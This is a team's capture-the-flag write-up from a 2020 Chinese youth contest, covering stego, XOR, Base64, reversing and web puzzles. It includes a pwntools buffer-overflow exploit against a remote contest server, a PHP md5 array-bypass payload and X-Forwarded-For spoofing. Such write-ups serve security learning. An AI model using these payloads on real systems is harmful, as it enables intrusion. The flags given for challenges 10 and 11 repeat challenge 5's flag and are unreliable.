2020强网杯青少赛Pursuing_The_Wind战队WRITEUP
在線文檔:https://docs.qq.com/doc/DZkN0RFFaR1ZDdHhD? ? 舊事拾荒,偶遇該文檔,既發。
戰隊信息
戰隊名稱:Pursuing_The_Wind
戰隊排名:12
解題情況
請粘貼戰隊排名截圖和答題情況截圖:
解題過程
2 一切皆可視
操作內容:
下載附件,得到一個Xml,找到了xml的制作來源是https://snap.berkeley.edu,也就是一個可視化編程網站,上傳后查看了一下代碼,并對代碼進行分析。?
然后他調用了一個JavaScript的函數,作用也就是異或,然后把異或后的值與一個鏈表進行比較,判斷輸入是否正確。所以只需要將鏈表進行異或解密即可。
(易語言寫的,主要是原來有寫完的模塊,并且為了答題速度~~)
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
| .版本 2 .支持庫 spec .程序集 程序集1 .子程序 _啟動子程序, 整數型, , 本子程序在程序啟動后最先執行 調試輸出 (到文本 (Section_Xor ({ 71, 77, 64, 70, 90, 86, 18, 77, 16, 98, 17, 76, 18, 126, 97, 79, 69, 126, 102, 17, 17, 69, 126, 77, 116, 66, 74, 0, 92 }, 33))) 返回 (0) ' 可以根據您的需要返回任意數值 .子程序 Section_Xor, 字節集, 公開 .參數 bin, 字節集 .參數 root, 整數型 .局部變量 i, 整數型 .計次循環首 (取字節集長度 (bin), i) bin [i] = 位異或 (bin [i], root) .計次循環尾 () 返回 (bin) |
flag值:
flag{w3l1C0m3_@nd_G00d_lUck!}
3 Luo_Tianyi
操作內容:
下載附件,得到一個圖片,然后圖片是洛天依的美照。隨后我們看了一下熟悉的圖片隱寫工具,steghide,隨手輸入了一下指令(密碼是逐漸試錯的過程,使用了不下20多個密碼最后發現竟然是luotianyi。。)得到flag.txt。
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
flag值:
flag{8dfe88db-0def-4873-9f17-f9c46bd571b6}
4 git的謎底
操作內容:
第一:我們先打開這個zip壓縮包直接解壓
發現一個名為enjoy.mid音頻文件,打開之后發現音樂貌似還挺好聽的
第二:習慣性將隱寫術的題用記事本打開,第一眼看見一個花括號,然后發現flag這幾個字母
第三:發現這一行英文是倒著的,然后進行提交試了一下
第四:提交上去之后發現做對了然后拿到了一血
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
flag值:
flag{misc_stegano_is_everywhere}
5 easy_pcap
操作內容:
下載附件, 得到一個流量包,然后我們用Wireshark查看了一下流量包的內容。發現了其流量包中不止一個Base64。
?其中一個可能是誤導flag,此flag為:flag{This_is_faker}
仔細尋找后,
發現GET /ZmxhZyU3QjElMjdtX0g0Y0tfVjFzaTdfWTB1Ul9Db01wdXRlcl9hd2VTb21lJTdE.php
HTTP/1.1\r\n
進行Base64解碼后,得到Flag,%7B和%7D是{}的Hex。
找到了真正的Flag
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
flag值:
flag{1%27m_H4cK_V1si7_Y0uR_CoMputer_aweSome}
6 問卷調查
操作內容:
進入題目,解答完問卷后,得到flag: flag{少年智則國智,少年強則國強}
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
flag值:
flag{少年智則國智,少年強則國強}
7 moss
操作內容:
獲取題目,打開moss.txt,得到一串摩爾斯密碼
使用https://www.bejson.com/enc/morse/進行解密摩爾斯密碼,得到flag:FLAG%u7bMOSSISVERYF4NTY%u7d,7b和7d分別是花括號的左邊和右邊,然后得到falg:flag{mossisveryf4nty}
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
flag值:
flag{mossisveryf4nty}
8 base64
操作內容:
下載附件,得到兩個txt,一個是flag,一個是泄露的密文。
然后經過分析,了解了Base64的加密規則,覺得這個可能是存在自定義密鑰,就根據Base64的加密規則,然后解出該Base64的密鑰,但Base64密鑰給出的不全。看到ABCDEFG什么的,就直接按順序補齊,后面又來個12345,直接補齊到9,然后填上+/,最后使用蘇紫方旋的Base64簡易解密工具進行解密,得到flag。
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
| import re ming = 'sadhlkj122i3upoi213456aABSADHKJHLKJSADSADJLKHUOIPQWUEYUGHJ123456789012233165410123123456789123709864hjklhfjldsnfzkpidjskljkamxcvmbcxamvbnm' mi = 'h2QDfRrKfCPsxFDticMpfYTrxtV1yFQMVEyMWPAwXDAxX0IYVZWYVZWvYPnTaZ9uZQQcaZaeaZiTXCPsxtV1yCh4zYLrxCTtxtP2yYVrxOPsxtPsxtV1yCh4zYPsxthqzYl2yRAJf2rHeFImeSyoeGIKhREDfGyKgRIKdb14d3endFy4db12dF5nn' def toBinStr(c): bin_str = bin(ord(c))[2:] bin_str = (8 - len(bin_str)) * '0' + bin_str return bin_str bin_str_arr = ''.join(list(map(toBinStr, ming))) new_str_len = int(len(bin_str_arr) / 6) if int( re.search(r'\.(\d+)', str(len(bin_str_arr) / 6)).groups()[0]) == 0 else len(bin_str_arr) // 6 + 1 print(bin_str_arr) cipher_dict = {} for i in range(new_str_len): bin_str = bin_str_arr[i * 6: i * 6 + 6] if len(bin_str) != 6: bin_str += (6 - len(bin_str)) * '0' cipher_dict[mi[i]] = int(bin_str, 2) print(cipher_dict) new_cipher_tuple = sorted(cipher_dict.items(), key=lambda item: item[1]) print(new_cipher_tuple) new_cipher = '' for (c, i) in new_cipher_tuple: new_cipher += c print(new_cipher, len(new_cipher)) # 輸出54位,隨后按照順序補全64位 # LMNOPQRSTuvwxyzUVWXYZabcdefghijklABCDEFGHIJKmnopqrst0123456789+/ # LMNOPQRSTuvwxyzUVWXYZabcdefghiJKlABCDEFGHIJKmnopqrst0123456789+/ # LMNOPQRSTuvwxyzUVWXYZabcdefghijklABCDEFGHIJKmnopqrst0123456789+/ |
flag值:
flag{Base64_1s_S0_F4nta5tic}
10 easy_Crypto
操作內容:
下載附件, 得到一張圖片。
題目提示,想到了豬圈密碼,從網上找到豬圈密碼解密,然后逐個選擇,解出結果。
(上圖少輸入了幾個,,下面補齊了一下。)
然后把下劃線和花括號加上,得到結果:fpyitlyth__nsiaropiosengcgasstrg{r_e}
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
flag值:
flag{1%27m_H4cK_V1si7_Y0uR_CoMputer_aweSome}
11 easy_Crypto
操作內容:
打開壓縮包文件python文件,發現是異或之后再進行加法計算,所以進行減法后異或。
以下是易語言的代碼:
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
| .版本?2 .支持庫?spec .子程序?_臨時子程序 .局部變量?bin,?字節集 .局部變量?k,?整數型 .局部變量?size,?整數型 bin?=?{?49,?60,?58,?53,?50,?107,?117,?63,?57,?107,?63,?109,?66,?137,?65,?119,?118,?128,?142,?118,?117,?118,?123,?147,?77,?126,?130,?124,?152,?80,?127,?134,?83,?87,?134,?87,?147,?148,?142,?95,?93,?85?} size?=?取字節集長度?(bin) .計次循環首?(size,?k) ????bin?[k]?=?bin?[k]?-?k ????bin?[k]?=?位異或?(bin?[k],?86) .計次循環尾?() 調試輸出?(到文本?(bin)) |
flag值:
flag{1%27m_H4cK_V1si7_Y0uR_CoMputer_aweSome}
13 加減乘除
操作內容:
下載文件后,載入ida,找到main函數并查看偽代碼
其中的sub_1260函數和sub_140A需要著重分析
sub_1260()是輸出了些字符串,這里輸入個name不知道是做啥的,暫且記錄下
sub_140A這個函數是一個數學游戲,主要作用是循環讀取字符,然后最后要滿足=66,字符串不能超過12,每次運算的值不能大于66
分析字符的意思,分別功能對應的字符是abcd
最下面有個值判斷,然后調用了sub_1249這個函數
我們分析sub_1249
發現是一個linux的指令
那么這里應該是輸出flag的函數了
那么解題方法,先解決數學游戲的問題
咱們用易語言爆破出提交的字符
(使用的易語言代碼是下方的易語言代碼)
下面是使用易語言爆破的數學運算代碼:
| .版本 2 .支持庫 spec .程序集 窗口程序集_啟動窗口 .子程序 Code_Create .局部變量 i, 整數型 .局部變量 a, 文本型 .局部變量 size, 整數型 .計次循環首 (12, size) .計次循環首 (size, i) .計次循環首 (i, ) a = a + “ ” .計次循環尾 () a = a + “.計次循環首 (4, i [” + 到文本 (i) + “])” + #換行符 .計次循環尾 () .計次循環首 (size + 1, ) a = a + “ ” .計次循環尾 () a = a + “.如果真(” .計次循環首 (size, i) a = a + “faa (i [” + 到文本 (size - i + 1) + “],” .計次循環尾 () a = a + “0” .計次循環首 (size, ) a = a + “)” .計次循環尾 () a = a + “==66)” + #換行符 .計次循環首 (size + 2, ) a = a + “ ” .計次循環尾 () a = a + “a=a+dwb(i[1])+dwb(i[2])+dwb(i[3])+dwb(i[4])+dwb(i[5])+dwb(i[6])+dwb(i[7])+dwb(i[8])+dwb(i[9])+dwb(i[10])+dwb(i[11])+dwb(i[12])+#hhf” + #換行符 .計次循環首 (size + 1, ) a = a + “ ” .計次循環尾 () a = a + “.如果真結束” + #換行符 .計次循環首 (size, i) .計次循環首 (-i + 1 + size, ) a = a + “ ” .計次循環尾 () a = a + “.計次循環尾()” + #換行符 .計次循環尾 () .計次循環尾 () 置剪輯板文本 (a) .子程序 __啟動窗口_創建完畢 .局部變量 i, 整數型, , "13" .局部變量 a, 文本型 編輯框1.是否允許多行 = 真 Code_Create () 編輯框1.內容 = 取剪輯板文本 () .計次循環首 (4, i [1]) .如果真 (faa (i [1], 0) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環首 (4, i [1]) .計次循環首 (4, i [2]) .如果真 (faa (i [2], faa (i [1], 0)) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環尾 () .計次循環首 (4, i [1]) .計次循環首 (4, i [2]) .計次循環首 (4, i [3]) .如果真 (faa (i [3], faa (i [2], faa (i [1], 0))) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環首 (4, i [1]) .計次循環首 (4, i [2]) .計次循環首 (4, i [3]) .計次循環首 (4, i [4]) .如果真 (faa (i [4], faa (i [3], faa (i [2], faa (i [1], 0)))) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環首 (4, i [1]) .計次循環首 (4, i [2]) .計次循環首 (4, i [3]) .計次循環首 (4, i [4]) .計次循環首 (4, i [5]) .如果真 (faa (i [5], faa (i [4], faa (i [3], faa (i [2], faa (i [1], 0))))) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環首 (4, i [1]) .計次循環首 (4, i [2]) .計次循環首 (4, i [3]) .計次循環首 (4, i [4]) .計次循環首 (4, i [5]) .計次循環首 (4, i [6]) .如果真 (faa (i [6], faa (i [5], faa (i [4], faa (i [3], faa (i [2], faa (i [1], 0)))))) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環首 (4, i [1]) .計次循環首 (4, i [2]) .計次循環首 (4, i [3]) .計次循環首 (4, i [4]) .計次循環首 (4, i [5]) .計次循環首 (4, i [6]) .計次循環首 (4, i [7]) .如果真 (faa (i [7], faa (i [6], faa (i [5], faa (i [4], faa (i [3], faa (i [2], faa (i [1], 0))))))) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環首 (4, i [1]) .計次循環首 (4, i [2]) .計次循環首 (4, i [3]) .計次循環首 (4, i [4]) .計次循環首 (4, i [5]) .計次循環首 (4, i [6]) .計次循環首 (4, i [7]) .計次循環首 (4, i [8]) .如果真 (faa (i [8], faa (i [7], faa (i [6], faa (i [5], faa (i [4], faa (i [3], faa (i [2], faa (i [1], 0)))))))) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環首 (4, i [1]) .計次循環首 (4, i [2]) .計次循環首 (4, i [3]) .計次循環首 (4, i [4]) .計次循環首 (4, i [5]) .計次循環首 (4, i [6]) .計次循環首 (4, i [7]) .計次循環首 (4, i [8]) .計次循環首 (4, i [9]) .如果真 (faa (i [9], faa (i [8], faa (i [7], faa (i [6], faa (i [5], faa (i [4], faa (i [3], faa (i [2], faa (i [1], 0))))))))) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環首 (4, i [1]) .計次循環首 (4, i [2]) .計次循環首 (4, i [3]) .計次循環首 (4, i [4]) .計次循環首 (4, i [5]) .計次循環首 (4, i [6]) .計次循環首 (4, i [7]) .計次循環首 (4, i [8]) .計次循環首 (4, i [9]) .計次循環首 (4, i [10]) .如果真 (faa (i [10], faa (i [9], faa (i [8], faa (i [7], faa (i [6], faa (i [5], faa (i [4], faa (i [3], faa (i [2], faa (i [1], 0)))))))))) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環首 (4, i [1]) .計次循環首 (4, i [2]) .計次循環首 (4, i [3]) .計次循環首 (4, i [4]) .計次循環首 (4, i [5]) .計次循環首 (4, i [6]) .計次循環首 (4, i [7]) .計次循環首 (4, i [8]) .計次循環首 (4, i [9]) .計次循環首 (4, i [10]) .計次循環首 (4, i [11]) .如果真 (faa (i [11], faa (i [10], faa (i [9], faa (i [8], faa (i [7], faa (i [6], faa (i [5], faa (i [4], faa (i [3], faa (i [2], faa (i [1], 0))))))))))) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環首 (4, i [1]) .計次循環首 (4, i [2]) .計次循環首 (4, i [3]) .計次循環首 (4, i [4]) .計次循環首 (4, i [5]) .計次循環首 (4, i [6]) .計次循環首 (4, i [7]) .計次循環首 (4, i [8]) .計次循環首 (4, i [9]) .計次循環首 (4, i [10]) .計次循環首 (4, i [11]) .計次循環首 (4, i [12]) .如果真 (faa (i [12], faa (i [11], faa (i [10], faa (i [9], faa (i [8], faa (i [7], faa (i [6], faa (i [5], faa (i [4], faa (i [3], faa (i [2], faa (i [1], 0)))))))))))) = 66) a = a + 到文本 (i [1]) + 到文本 (i [2]) + 到文本 (i [3]) + 到文本 (i [4]) + 到文本 (i [5]) + 到文本 (i [6]) + 到文本 (i [7]) + 到文本 (i [8]) + 到文本 (i [9]) + 到文本 (i [10]) + 到文本 (i [11]) + 到文本 (i [12]) + #換行符 .如果真結束 .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () .計次循環尾 () 調試輸出 (a) 置剪輯板文本 (a) 子程序1 () .子程序 faa, 整數型 .參數 i, 整數型 .參數 a, 整數型 .如果真 (i = 1) a = a + 4 .如果真結束 .如果真 (i = 2) a = a × 7 .如果真結束 .如果真 (i = 3) a = 到整數 (a ÷ 5) .如果真結束 .如果真 (i = 4) a = 3 .如果真結束 .如果真 (a > 66) a = -9999999999999 .如果真結束 返回 (a) .子程序 子程序1 .局部變量 j, 整數型 .局部變量 sth, 文本型, , "0" .局部變量 i, 整數型 .局部變量 a, 整數型 .局部變量 t, 邏輯型 sth = 分割文本 (取剪輯板文本 (), #換行符, ) .計次循環首 (5, i) a = 0 .計次循環首 (12, j) t = 假 .如果 (t = 假) .如果真 (取文本中間 (sth [i], j, 1) = “1”) a = a + 4 .如果真結束 .如果真 (取文本中間 (sth [i], j, 1) = “2”) a = a × 7 .如果真結束 .如果真 (取文本中間 (sth [i], j, 1) = “3”) a = 到整數 (a ÷ 5) .如果真結束 .如果真 (取文本中間 (sth [i], j, 1) = “4”) a = 3 .如果真結束 .如果真 (a > 66) t = 真 .如果真結束 .否則 跳出循環 () .如果結束 .計次循環尾 () 調試輸出 (子文本替換 (子文本替換 (子文本替換 (子文本替換 (sth [i], “1”, “b”, , , 真), “4”, “a”, , , 真), “2”, “c”, , , 真), “3”, “d”, , , 真)) .計次循環尾 () |
然后怎么執行flag的輸出函數呢
回到這個判斷
有一個40A0地址的值決定了執行
那么怎么更改呢
在一開始輸入name的時候,有個字符串,那個地址是不是和這個很接近
那個0x4060的地址,計算偏移(A0-60),寫出exp
運行exp得到flag
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
下面是使用Python寫的exp代碼:
| from?pwn?import?* from?struct?import?* p=?remote("182.92.184.215","12345") print(p.recv()) print(p.recv()) print(p.recv()) print(p.recv()) print(p.recv()) print(p.recv()) print(p.recv()) print(p.recv()) print(p.recv()) p.sendline(b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa') print(p.recv()) '''''' print(p.recv()) print(p.recv()) p.sendline(b'b') p.sendline(b'c') p.sendline(b'b') p.sendline(b'd') p.sendline(b'c') p.sendline(b'b') p.sendline(b'b') p.sendline(b'b') p.sendline(b'b') p.sendline(b'b') p.sendline(b'b') print(p.recv()) print(p.recv()) print(p.recv()) p.sendline(b"icq85111cf79bd01834d8d73c3f5dae8") print(p.recv()) print(p.recv()) |
flag值:
flag{659599c68e85445c3ca6844c2ec78594}
17 簽到
操作內容:
獲取容器,查看題目提示得到了輸入任意字符即可查看,瀏覽器進入,瘋狂回車,得到flag。
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
flag值:
flag{023025ea-c06e-4ad8-9e26-ec5a0eba3527}
18 easy_http
操作內容:
下發環境后,進入容器里,看到提示需要我們post一下fruit參數,內容為apple。
我們使用瀏覽器的Hackbar插件,修改地址進行post。
然后看到需要一個Post請求,請求為vegetable,同樣使用這個插件進行,進行提交。
然后發現我們需要使用127.0.0.1,我們使用XFF修改IP:X-Forwarded-For: 127.0.0.1
但是沒有提示什么flag,我們嘗試把提示的信息放到UA里。
最后解出Flag。
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
flag值:
flag{56b0efb2-c299-40d28fd2-606e3f2f17c2}
22 easy_php
操作內容:
獲取容器,進入看到了一串PHP代碼,第一步也就是需要使用兩個參數繞過php的md5類型,需要兩個值不同但不可以md5的數據類型,并且看到第二次和第一次的代碼除了變量不同相差無幾,就試了試數組繞過。
?a1[1]=001?&?a2[1]=02&b1[1]=001?&?b2[1]=02
成功繞過兩個之后,需要輸入一個時間,時間的長度不能大于4而且要和時間戳作比較,所以就想到了使用科學計數法。轉換為7e10,最后提交,得到flag。
?a1[1]=001?&?a2[1]=02&b1[1]=001?&?b2[1]=02&time=7e10
如該題使用自己編寫的腳本代碼請詳細寫出,不允許截圖
flag值:
flag{7e8e3c64-6213-45fd-a1dc-0d1771ace6dc}
總結
以上是生活随笔為你收集整理的2020强网杯青少赛Pursuing_The_Wind战队WRITEUP的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: android wear评测,andro
- 下一篇: C# Android wifi控制灯,求